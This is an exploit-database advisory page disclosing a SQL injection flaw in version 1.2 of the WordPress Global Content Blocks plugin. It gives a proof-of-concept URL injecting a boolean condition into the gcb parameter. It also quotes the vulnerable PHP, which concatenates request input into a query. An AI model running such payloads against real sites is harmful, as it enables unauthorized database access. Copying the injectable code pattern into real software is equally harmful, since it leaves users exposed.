WordPress Global Content Blocks 1.2 SQL Injection

2011.08.19
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: WordPress Global Content Blocks plugin <= 1.2 SQL Injection Vulnerability # Date: 2011-08-18 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/global-content-blocks.1.2.zip # Version: 1.2 (tested) --- PoC --- http://www.site.com/wp-content/plugins/global-content-blocks/gcb/gcb_export.php?gcb=1 AND 1=1 --------------- Vulnerable code --------------- $ids = explode(";",$_GET["gcb"]); $final_text = array(); foreach($ids as $id) { if(intval($id)>0) { // intval("1a") => 1 :) $entry = $wpdb->get_row("select * from ".$wpdb->prefix."gcb where id=".$id); $final_text[] = base64_encode($entry->name)."<;>". base64_encode($entry->description)."<;>". base64_encode($entry->value)."<;>". base64_encode($entry->type); } }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top